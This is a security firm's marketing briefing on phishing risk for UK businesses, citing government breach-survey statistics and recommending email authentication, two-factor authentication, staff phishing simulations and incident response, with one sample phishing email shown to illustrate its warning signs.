The government's own data is clear: 88% of breached businesses traced their incident back to a phishing email. That is not a technology problem. It is a people problem, a process problem, and a board-level responsibility. This briefing breaks down what the attacks look like, how they work, and what you can do about them this quarter.
The Cyber Security Breaches Survey 2025/2026, published by the Department for Science, Innovation and Technology, surveyed 2,112 businesses. These are the findings that should be keeping business owners up at night.
That is approximately 612,000 businesses reporting at least one cyber breach or attack in the last twelve months. The number has held flat since last year, which means the problem is not getting better. It is becoming background noise.
Among those who were breached, phishing was the attack method in 88% of cases. 51% experienced phishing and nothing else. This is not one of many threats. It is functionally the only threat most businesses will ever face.
For those who got hit properly, the outcomes are meaner than last year. Revenue loss jumped, reputational damage tripled from 1% to 3%, and micro-businesses recovering within a day fell from 92% to 86%. The tail is uglier.
Only 25% of businesses have a formal incident response plan. Only 34% patch critical vulnerabilities within 14 days. Only 47% have two-factor authentication. The basics are not in place for the majority.
BUSINESSES HIT
IN 12 MONTHS
TOTAL CYBER CRIMES
AGAINST BUSINESSES
HAVE 2FA
DEPLOYED
HOLD CYBER
ESSENTIALS
Modern phishing campaigns are not random spam blasts. They are structured operations with defined stages, each exploiting a different weakness. Each stage is also a point where the right control can stop them dead.
CLICK EACH STAGE TO EXPAND ATTACKER vs DEFENDER DETAIL
Attackers invest real effort into crafting emails that look legitimate. Knowing the indicators, both visible and hidden in email headers, is the first line of human-layer defence.
Dear Account Holder,
We have detected unusual sign-in activity from an unrecognised device in Eastern Europe. To protect your account, verify your credentials within 24 hours or your account will be permanently suspended.
https://m1crosoft-verify.com/secure-login?token=8kx29Jqp
This is the single most dangerous sentence in business cybersecurity. It is not just wrong. It is precisely what attackers are counting on you to believe. Here is why.
Attackers do not browse a directory and hand-pick targets. Modern phishing campaigns are automated, industrialised operations. They scrape thousands of email addresses from public sources, breached databases, and Companies House filings, then blast lures at scale. Your business does not need to be interesting. It just needs to exist and have an email address.
That is not a rounding error. Nearly half of the smallest businesses in the country experienced some form of breach or attack. The survey explicitly notes that this is likely an undercount, because many attacks go undetected entirely.
Every business holds data that has direct monetary value on criminal marketplaces. Customer email addresses, payment card details, staff national insurance numbers, supplier banking information, login credentials. Even a small customer database of 200 records has resale value. An email account with access to invoice workflows is worth more than a stolen credit card, because it enables business email compromise fraud worth thousands per transaction.
Small businesses are routinely used as staging grounds for attacks against larger targets. If your business has a single email integration, shared drive, or VPN connection with a larger client, you are a door into their network. Only 15% of businesses review the cyber risk posed by their immediate suppliers. Only 6% look at the wider supply chain. Attackers know this and exploit the weakest link.
Beyond supply chain attacks, compromised small business infrastructure gets conscripted into botnets. Your office router, NAS drive, or unpatched server becomes a zombie device, used to relay spam, launch denial-of-service attacks, or host phishing pages that target other victims. You may never know it happened, and your IP address ends up on blocklists, damaging your email deliverability and business reputation.
Credential breaches are cumulative. When a major platform gets compromised, millions of email and password combinations end up in publicly traded databases. If any of your staff reuse passwords (and statistically, most do), those credentials are already circulating. Attackers run credential stuffing attacks against business email portals, accounting software, and cloud platforms using these leaked pairs. You do not need to be directly attacked. You are caught in the splash damage of someone else's breach.
The survey found that 19% of businesses were victims of at least one cyber crime, and the mean number of cyber crimes per victim was 19. That is not a one-and-done event. It is sustained, repeated targeting.
No single control stops phishing. Effective protection requires defence in depth, layering technical controls, process, and people-led awareness into a coherent, measurable programme.
These three DNS-based protocols are the foundation of email authentication. Without them, anyone can send email that appears to come from your domain. DMARC at reject policy prevents the vast majority of spoofed email from reaching your staff.
The government survey shows only 47% of businesses have two-factor authentication and only 5% hold Cyber Essentials certification. Email authentication deployment is even lower across the broader business population.
// ADOPTION RATES ACROSS THE BUSINESS POPULATION
The most effective way to reduce human-layer risk is to put your staff through realistic, controlled phishing simulations before real attackers do. Frameworks like Gophish allow security teams to craft and deploy campaigns that mirror real-world tactics, track click rates, and trigger immediate contextual training for those who fall victim.
The government data shows only 19% of businesses ran any kind of staff training or awareness activity. Click-through rates above 10% indicate a high-risk workforce. Businesses running quarterly simulations typically see a 60-70% reduction within 12 months.
Generative AI has fundamentally changed the threat landscape. Attackers now produce flawless, personalised phishing emails at scale, sourced from a target's public LinkedIn profile, company website, and social media. Rule-based filters that relied on spelling mistakes and generic templates are becoming obsolete.
Modern defensive models analyse message semantics, sender reputation, URL characteristics, and behavioural signals simultaneously, flagging suspicious emails before they reach an inbox. Credential phishing now accounts for 94% of all payload-based email attacks globally.
The government survey found 31% of businesses are using or considering AI, but only 24% of those have any cyber processes for managing AI risk. Adoption is outrunning governance.
ML classifiers trained on threat intelligence datasets achieve 94%+ accuracy on known phishing patterns. 313SEC integrates reputation feeds and real-time URL analysis into managed detection workflows.
When a user clicks, endpoint controls are your final barrier. Attack Surface Reduction rules, PowerShell logging, and network protection policies stop payloads from executing even after a successful phishing click.
Response speed is the single greatest determinant of breach cost. Under UK GDPR, personal data breaches must be reported to the ICO within 72 hours. The decisions made in that window define the outcome.
Based on the government survey data and our own assessment work, these are the control areas with the highest risk scores and the greatest opportunity for rapid improvement.
313SEC delivers phishing simulation programmes, email authentication configuration, and ongoing managed detection built specifically for businesses who need enterprise-grade protection without enterprise overhead.
If anything in this briefing made you tilt your head, drop your details below. No sales script, no auto-sequence. Just a real reply from a real person within a working day or two.
You'll get a real reply, from a real person, within a couple of working days. Cheers for reading.